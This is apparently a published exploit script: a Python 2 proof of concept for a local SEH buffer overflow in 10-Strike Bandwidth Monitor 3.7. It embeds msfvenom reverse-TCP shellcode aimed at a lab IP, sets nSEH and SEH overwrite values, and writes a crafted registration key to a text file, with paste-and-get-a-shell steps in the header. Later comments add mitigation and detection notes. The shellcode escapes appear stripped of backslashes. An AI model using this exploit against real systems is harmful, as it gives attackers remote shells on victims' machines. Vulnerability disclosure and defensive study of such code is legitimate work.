# Title: 10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow SEH
# Date: 2018-07-24
# Exploit Author: absolomb
# Vendor Homepage: https://www.10-strike.com/products.shtml
# Software Link: https://www.10-strike.com/bandwidth-monitor/download.shtml
# Run script, open up generated txt file and copy to clipboard
# Open Bandwidth Monitor, Enter my key, Paste code from clipboard, hit OK, boom shell.
# Or from inside the app you can go to the Help tab, click Registration and Paste code from clipboard, hit OK, boom shell.

#!/usr/bin/python

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -b 'x00x0ax0d' -f python -v shellcode
# Stage delivered after control-flow hijack: the msfvenom output named in the
# comment above, with the author's lab LHOST/LPORT baked in.  Python 2 source
# (print statements below), so these are byte strings, not unicode.
shellcode = ""
shellcode += "xbbx03xe2x9bxb7xdaxc3xd9x74x24xf4x5e"
shellcode += "x29xc9xb1x52x31x5ex12x83xc6x04x03x5d"
shellcode += "xecx79x42x9dx18xffxadx5dxd9x60x27xb8"
shellcode += "xe8xa0x53xc9x5bx11x17x9fx57xdax75x0b"
shellcode += "xe3xaex51x3cx44x04x84x73x55x35xf4x12"
shellcode += "xd5x44x29xf4xe4x86x3cxf5x21xfaxcdxa7"
shellcode += "xfax70x63x57x8excdxb8xdcxdcxc0xb8x01"
shellcode += "x94xe3xe9x94xaexbdx29x17x62xb6x63x0f"
shellcode += "x67xf3x3axa4x53x8fxbcx6cxaax70x12x51"
shellcode += "x02x83x6ax96xa5x7cx19xeexd5x01x1ax35"
shellcode += "xa7xddxafxadx0fx95x08x09xb1x7axcexda"
shellcode += "xbdx37x84x84xa1xc6x49xbfxdex43x6cx6f"
shellcode += "x57x17x4bxabx33xc3xf2xeax99xa2x0bxec"
shellcode += "x41x1axaex67x6fx4fxc3x2axf8xbcxeexd4"
shellcode += "xf8xaax79xa7xcax75xd2x2fx67xfdxfcxa8"
shellcode += "x88xd4xb9x26x77xd7xb9x6fxbcx83xe9x07"
shellcode += "x15xacx61xd7x9ax79x25x87x34xd2x86x77"
shellcode += "xf5x82x6ex9dxfaxfdx8fx9exd0x95x3ax65"
shellcode += "xb3x59x12x4axc3x32x61x94xc2x79xecx72"
shellcode += "xaex6dxb9x2dx47x17xe0xa5xf6xd8x3exc0"
shellcode += "x39x52xcdx35xf7x93xb8x25x60x54xf7x17"
shellcode += "x27x6bx2dx3fxabxfexaaxbfxa2xe2x64xe8"
shellcode += "xe3xd5x7cx7cx1ex4fxd7x62xe3x09x10x26"
shellcode += "x38xeax9fxa7xcdx56x84xb7x0bx56x80xe3"
shellcode += "xc3x01x5ex5dxa2xfbx10x37x7cx57xfbxdf"
shellcode += "xf9x9bx3cx99x05xf6xcax45xb7xafx8ax7a"
shellcode += "x78x38x1bx03x64xd8xe4xdex2cxe8xaex42"
shellcode += "x04x61x77x17x14xecx88xc2x5bx09x0bxe6"
shellcode += "x23xeex13x83x26xaax93x78x5bxa3x71x7e"
shellcode += "xc8xc4x53"

# nSEH slot ("JMP always true" per the author): presumably a pair of
# complementary conditional jumps that together always skip over the SEH
# record into the shellcode that follows it — confirm by disassembling.
nseh = 'x71x06x70x04'

# SEH slot: address of a POP POP RET sequence inside BandMonitor.exe
# (0x01174647 per the author).  Mitigation note: a usable gadget at a fixed
# address in the main image indicates the binary was built without SafeSEH
# and without ASLR (/DYNAMICBASE); either flag would defeat this technique —
# verify against the PE header of the shipped executable.
seh = 'x47x46x17x01'

# Crafted "registration key".  Layout: filler up to the SEH record, then the
# nSEH and SEH overwrites, then the stage, then trailing filler so the total
# length is constant regardless of stage size (1804 is the reserved region
# after the SEH record, per the author's offsets).  Root cause on the target
# side is an unbounded copy of the key string into a stack buffer; a length
# check on that field, or DEP (/NXCOMPAT), would each stop the stage running.
payload = 'x41' * 4188
payload += nseh
payload += seh
payload += shellcode
payload += 'x41' * (1804 - len(shellcode))

# Emit the key to sploit.txt for manual paste into the Registration dialog
# (see header).  Detection angle: a several-kilobyte registration key is far
# outside any legitimate key length and is the observable indicator here.
file = open('sploit.txt','w')
print "Size: " + str(len(payload)) + " bytes"
file.write(payload)
file.close()
print "TXT file created!"